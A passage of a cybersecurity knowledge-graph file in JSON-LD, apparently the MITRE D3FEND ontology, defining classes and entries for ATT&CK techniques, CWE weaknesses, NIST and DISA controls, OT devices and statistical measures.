      "rdfs:label": "GNSS Satellite",
      "rdfs:seeAlso": {
        "@id": "dbr:Satellite_navigation"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Satellite"
        },
        {
          "@id": "_:N8232e9829d3a44c5be3affdd1265aaf2"
        },
        {
          "@id": "_:N9a3d6628c39844a28e446c640e0403b1"
        }
      ]
    },
    {
      "@id": "_:N8232e9829d3a44c5be3affdd1265aaf2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AtomicClock"
      }
    },
    {
      "@id": "_:N9a3d6628c39844a28e446c640e0403b1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GNSSSignal"
      }
    },
    {
      "@id": "d3f:CCI-000213_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces approved authorizations for logical access to information and system resources in accordance with applicable access control policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000213"
    },
    {
      "@id": "d3f:CWE-24",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-24",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"../\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '../filedir'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:FPGABitstream",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A binary configuration file generated by synthesizing and placing-and-routing an HDL design, which is loaded into a Field-Programmable Gate Array (FPGA) to physically define its internal logic, interconnects, and I/O behavior. Rather than being executed by a processor, it programs the device itself.",
      "rdfs:label": "FPGA Bitstream",
      "rdfs:seeAlso": {
        "@id": "dbr:Bitstream"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfigurationFile"
      }
    },
    {
      "@id": "d3f:OWL",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-OWL",
      "d3f:definition": "The Web Ontology Language (OWL) is a family of knowledge representation languages for authoring ontologies.",
      "d3f:kb-article": "## How it works\nOntologies are a formal way to describe taxonomies and classification networks, essentially defining the structure of knowledge for various domains: the nouns representing classes of objects and the verbs representing relations between the objects.\n\nThe OWL languages are characterized by formal semantics. They are built upon the World Wide Web Consortium's (W3C) standard for objects called the Resource Description Framework (RDF). OWL classes correspond to description logic (DL) _concepts_, OWL properties to DL _roles_, and individuals are named the same way in OWL and other DLs.\n\n## References\n1. Web Ontology Language. (2023, April 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Web_Ontology_Language)",
      "d3f:synonym": "Web Ontology Language",
      "rdfs:label": "OWL",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptionLogic"
      }
    },
    {
      "@id": "d3f:T0886",
      "@type": "owl:Class",
      "d3f:attack-id": "T0886",
      "d3f:definition": "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network; some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019)",
      "rdfs:label": "Remote Services - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSInitialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        }
      ],
      "skos:prefLabel": "Remote Services"
    },
    {
      "@id": "d3f:CWE-178",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-178",
      "d3f:definition": "The product does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results.",
      "rdfs:label": "Improper Handling of Case Sensitivity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:implements",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x implements y: The entity x realizes entity y by putting its design or specification into effect.",
      "rdfs:label": "implements",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:OperatingSystemSharedLibraryFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system shared library file is a shared library file that is part of the operating system and that incorporates common operating system code for use by any application or to provide operating system services.",
      "rdfs:label": "Operating System Shared Library File",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/Library_(computing)#Shared_libraries"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemFile"
        },
        {
          "@id": "d3f:SharedLibraryFile"
        }
      ]
    },
    {
      "@id": "d3f:Reference-AutorunDifferences_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-01-002/"
      },
      "d3f:kb-abstract": "The Sysinternals tool Autoruns checks the registry and file system to identify known persistence mechanisms. It will output any tools identified, including built-in or added-on Microsoft functionality and third party software. Many of these locations are known by adversaries and used to obtain Persistence. Running Autoruns periodically in an environment makes it possible to collect and monitor its output for differences, which may include the removal or addition of persistent tools. Depending on the persistence mechanism and location, legitimate software may be more likely to make changes than an adversary tool. Thus, this analytic may result in significant noise in a highly dynamic environment. While Autoruns is a convenient method to scan for programs using persistence mechanisms, its scanning nature does not conform well to streaming based analytics. This analytic could be replaced with one that draws from sensors that collect registry and file information if streaming analytics are desired.\n\nUtilizes the Sysinternals autoruns tool (ignoring validated Microsoft entries). Primarily not a detection analytic by itself but through analysis of results by an analyst can be used for such. Building another analytic on top of this one identifying unusual entries would likely be a beneficial alternative.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemFileAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-01-002: Autorun Differences",
      "rdfs:label": "Reference - CAR-2013-01-002: Autorun Differences - MITRE"
    },
    {
      "@id": "d3f:ContentPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A set of rules and guidelines that dictate the acceptable use, distribution, and management of digital content within a system or platform. It defines what content is allowed, restricted, or prohibited, ensuring compliance with legal, ethical, and organizational standards.",
      "rdfs:label": "Content Policy",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:T1547.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.004",
      "d3f:definition": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Winlogon Helper DLL",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Nd64ea3c03aad4192afa4f85f57bb7c16"
        }
      ]
    },
    {
      "@id": "_:Nd64ea3c03aad4192afa4f85f57bb7c16",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:OTActuator",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OT actuator is an industrial-grade actuator optimized for operational technology (OT) environments, such as SCADA or process-control systems. It tolerates harsher conditions, meets stricter safety and reliability standards, and integrates seamlessly with ICS protocols to enable real-time mechanical motion or adjustments in production lines and critical infrastructure.",
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.gov/glossary/term/actuator"
      },
      "rdfs:label": "OT Actuator",
      "rdfs:subClassOf": {
        "@id": "d3f:Actuator"
      }
    },
    {
      "@id": "d3f:T1563",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:RemoteSession"
      },
      "d3f:attack-id": "T1563",
      "d3f:definition": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.",
      "d3f:produces": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      },
      "rdfs:label": "Remote Service Session Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:Neb926b819efb457a9c1c52cf3e74494b"
        },
        {
          "@id": "_:Nac9d367504a1453fbb7daa7e9ee6be28"
        }
      ]
    },
    {
      "@id": "_:Neb926b819efb457a9c1c52cf3e74494b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemoteSession"
      }
    },
    {
      "@id": "_:Nac9d367504a1453fbb7daa7e9ee6be28",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-512",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-512",
      "d3f:definition": "The product collects personally identifiable information about a human user or the user's activities, but the product accesses this information using other resources besides itself, and it does not require that user's explicit approval or direct input into the product.",
      "rdfs:label": "Spyware",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-506"
      }
    },
    {
      "@id": "d3f:StyleGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-STY",
      "d3f:definition": "Successor to the ProGAN.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). StyleGAN. [Link](https://en.wikipedia.org/wiki/StyleGAN)",
      "d3f:synonym": "Style GAN",
      "rdfs:label": "StyleGAN",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageSynthesisGAN"
      }
    },
    {
      "@id": "d3f:UserAccountDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account is disabled, preventing its active use within the system.",
      "rdfs:label": "User Account Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N0b969b65552144328e62bdd9c1e724b1"
        }
      ]
    },
    {
      "@id": "_:N0b969b65552144328e62bdd9c1e724b1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountEnableEvent"
      }
    },
    {
      "@id": "d3f:T1568",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1568",
      "d3f:definition": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "rdfs:label": "Dynamic Resolution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N39a540e89d884659a5adf3ff1f0cedb7"
        }
      ]
    },
    {
      "@id": "_:N39a540e89d884659a5adf3ff1f0cedb7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:CWE-523",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-523",
      "d3f:definition": "Login pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server.",
      "rdfs:label": "Unprotected Transport of Credentials",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:T1160",
      "@type": "owl:Class",
      "d3f:attack-id": "T1160",
      "d3f:definition": "Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.004",
      "rdfs:label": "Launch Daemon",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1082",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1082",
      "d3f:definition": "The code contains a class instance that calls the method or function to delete or destroy itself.",
      "rdfs:label": "Class Instance Self Destruction Control Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:T1070.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070.009",
      "d3f:definition": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)",
      "rdfs:label": "Clear Persistence",
      "rdfs:subClassOf": {
        "@id": "d3f:T1070"
      }
    },
    {
      "@id": "d3f:PowerShellProfileScript",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A PowerShell profile script is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.",
      "rdfs:label": "PowerShell Profile Script",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.1"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserInitScript"
      }
    },
    {
      "@id": "d3f:CCI-001677_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:MessageAuthentication"
        },
        {
          "@id": "d3f:SenderMTAReputationAnalysis"
        },
        {
          "@id": "d3f:SenderReputationAnalysis"
        },
        {
          "@id": "d3f:TransferAgentAuthentication"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs spam protection mechanisms at workstations, servers, or mobile computing devices on the network to detect and take action on unsolicited messages transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001677"
    },
    {
      "@id": "d3f:OTErrorMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "An anticipated, reproducible defect occurred within the system.",
      "rdfs:label": "OT Error Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDiagnosticsMessageEvent"
        },
        {
          "@id": "_:N2d2d13a3aca840bd8e16660f8d8ab994"
        }
      ]
    },
    {
      "@id": "_:N2d2d13a3aca840bd8e16660f8d8ab994",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTErrorMessage"
      }
    },
    {
      "@id": "d3f:CWE-1077",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1077",
      "d3f:definition": "The code performs a comparison such as an equality test between two float (floating point) values, but it uses comparison operators that do not account for the possibility of loss of precision.",
      "rdfs:label": "Floating Point Comparison with Incorrect Operator",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:T1073",
      "@type": "owl:Class",
      "d3f:attack-id": "T1073",
      "d3f:definition": "Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.002",
      "rdfs:label": "DLL Side-Loading",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:Reference-S7-1200-Programmable-controller",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.tia.siemens.cloud/r/simatic_s7_1200_manual_collection_enus_20/programming-concepts/using-blocks-to-structure-your-program/data-block-db"
      },
      "d3f:kb-abstract": "The S7-1200 programmable logic controllers (PLCs) can control a variety of automation applications. Compact design, affordable price, and a powerful instruction set make the S7-1200 CPU and modules a perfect solution for controlling a wide variety of applications. Together with the STEP 7 configuration and programming tool, you have the flexibility you need to design your automation solutions. This documentation provides information about the S7-1200 CPU and modules. It contains information for engineers, programmers, installers, and electricians.",
      "d3f:kb-organization": "SIEMENS",
      "d3f:kb-reference-of": {
        "@id": "d3f:OTVariableAccessRestriction"
      },
      "d3f:kb-reference-title": "S7-1200 Programmable controller",
      "rdfs:label": "Reference - S7-1200 Programmable controller"
    },
    {
      "@id": "d3f:StackSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:StackFrame"
      },
      "d3f:definition": "The stack segment contains the program stack, a last-in-first-out structure, typically allocated in the higher parts of memory for the process.",
      "rdfs:label": "Stack Segment",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Call_stack"
        },
        {
          "@id": "http://dbpedia.org/resource/Data_segment#Stack"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessSegment"
        },
        {
          "@id": "_:N846c1f7716c743fea81d3a65f496a83e"
        }
      ]
    },
    {
      "@id": "_:N846c1f7716c743fea81d3a65f496a83e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTSP800-53ControlCatalog"
      ],
      "d3f:archived-at": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2013-04-30"
      },
      "d3f:version": 4,
      "rdfs:label": "NIST SP 800-53 R4",
      "rdfs:seeAlso": {
        "@id": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2015-01-22"
      }
    },
    {
      "@id": "d3f:WindowsNtDeleteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Deletes the specified file.",
      "rdfs:label": "Windows NtDeleteFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIDeleteFile"
      }
    },
    {
      "@id": "d3f:GroupCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a new group is established within the system, defining an entity to manage users and permissions collectively.",
      "rdfs:label": "Group Creation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:GroupManagementEvent"
      }
    },
    {
      "@id": "d3f:DNSDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DNSDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:DNSNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-DNSDL",
      "d3f:definition": "Blocking DNS Network Traffic based on criteria such as IP address, domain name, or DNS query type.",
      "d3f:kb-article": "## How it works\nRules are implemented that filter DNS queries using criteria such as:\n- Client subnet\n- Type of network protocol used in query\n- Fully qualified domain name (FQDN) of record in the query\n- DNS Server IP address that received the DNS request\n- Type of DNS record being queried\n- Time of day the query is received\n- Size of the response\n\nFor example, a DNS policy can be created for blocking DNS queries for FQDNs that have been identified as unauthorized.\n\n## Considerations\n- Implementation considerations for DNS filtering policies to avoid over-blocking or under-blocking domains.\n- Continuous maintenance of unauthorized domain lists is needed to keep up to date with possible site content changes.\n- File sharing or content delivery networks may require other filtering techniques that are more fine-grained (URL blocking).\n- Access to malicious websites or other network resources directly by IP instead of by DNS record, or after alteration of local DNS hosts file, may not result in DNS network traffic.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "DNS Blacklisting",
      "rdfs:label": "DNS Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N5cc88bc9b2c84e9fb5d6c97ea49ae97c"
        }
      ]
    },
    {
      "@id": "_:N5cc88bc9b2c84e9fb5d6c97ea49ae97c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSNetworkTraffic"
      }
    },
    {
      "@id": "d3f:WindowsNtSuspendThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtSuspendThread",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendThread"
      }
    },
    {
      "@id": "d3f:InternetFileTransferTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Internet file transfer network traffic is network traffic related to file transfers between network nodes that crosses a boundary between networks. This includes only network traffic conforming to standard file transfer protocols, not custom transfer protocols.",
      "rdfs:label": "Internet File Transfer Traffic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileTransferNetworkTraffic"
        },
        {
          "@id": "d3f:InternetNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:MedianAbsoluteDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MAD",
      "d3f:definition": "The median absolute deviation (also MAD) is the median of the absolute deviations from the median.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Average absolute deviation. [Link](https://en.wikipedia.org/wiki/Average_absolute_deviation)",
      "rdfs:label": "Median Absolute Deviation",
      "rdfs:subClassOf": {
        "@id": "d3f:AverageAbsoluteDeviation"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:control-name": "Least Privilege",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-6"
    },
    {
      "@id": "d3f:StandardDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SD",
      "d3f:definition": "The standard deviation is a measure of the amount of variation or dispersion of a set of values.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Standard deviation. [Link](https://en.wikipedia.org/wiki/Standard_deviation)",
      "d3f:synonym": "SD",
      "rdfs:label": "Standard Deviation",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:T1587.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587.002",
      "d3f:definition": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.",
      "rdfs:label": "Code Signing Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1587"
      }
    },
    {
      "@id": "d3f:CCI-002630_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ScriptExecutionAnalysis"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system detects organization-defined unauthorized operating system commands through the kernel application programming interface at organization-defined information system hardware components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002630"
    },
    {
      "@id": "d3f:DNSRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Domain Name System (DNS) record is a record of information returned to clients seeking to find computers, services, and other resources connected to the Internet or a private network. Record information is stored on a domain name server so it can respond to DNS queries from clients. There are a variety of record types, depending on the client's information needs. Common types include Start of Authority, IP addresses, SMTP mail exchangers, name servers, reverse DNS lookup pointers, etc.",
      "rdfs:label": "DNS Record",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Domain_Name_System"
        },
        {
          "@id": "dbr:List_of_DNS_record_types"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:CCI-000060_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system conceals, via the session lock, information previously visible on the display with a publicly viewable image.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-19T00:00:00"
      },
      "rdfs:label": "CCI-000060"
    },
    {
      "@id": "d3f:OTTimeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Read, set, or calculate timing mechanisms.",
      "rdfs:label": "OT Time Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:N1eed4d8b6bc448a7be651b6e4cb749e7"
        }
      ]
    },
    {
      "@id": "_:N1eed4d8b6bc448a7be651b6e4cb749e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTTimeCommand"
      }
    },
    {
      "@id": "d3f:OTProcessDataHistorian",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:TimeSeriesDatabase"
      },
      "d3f:definition": "A system used to collect and store data, including telemetry, events, alerts, and alarms about the operational process and supporting devices.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Operational_historian"
      },
      "rdfs:label": "OT Process Data Historian",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Application"
        },
        {
          "@id": "_:N1d0a7bdb53d44b54961a3de3fadb60d5"
        }
      ]
    },
    {
      "@id": "_:N1d0a7bdb53d44b54961a3de3fadb60d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TimeSeriesDatabase"
      }
    },
    {
      "@id": "d3f:WeightedMean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-WM",
      "d3f:definition": "A mean that incorporates weighting to certain data elements.",
      "d3f:kb-article": "## Considerations\nThe arithmetic mean, geometric mean, and harmonic mean can all be weighted.\n\n## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Weighted Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:EXF-0002.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.03",
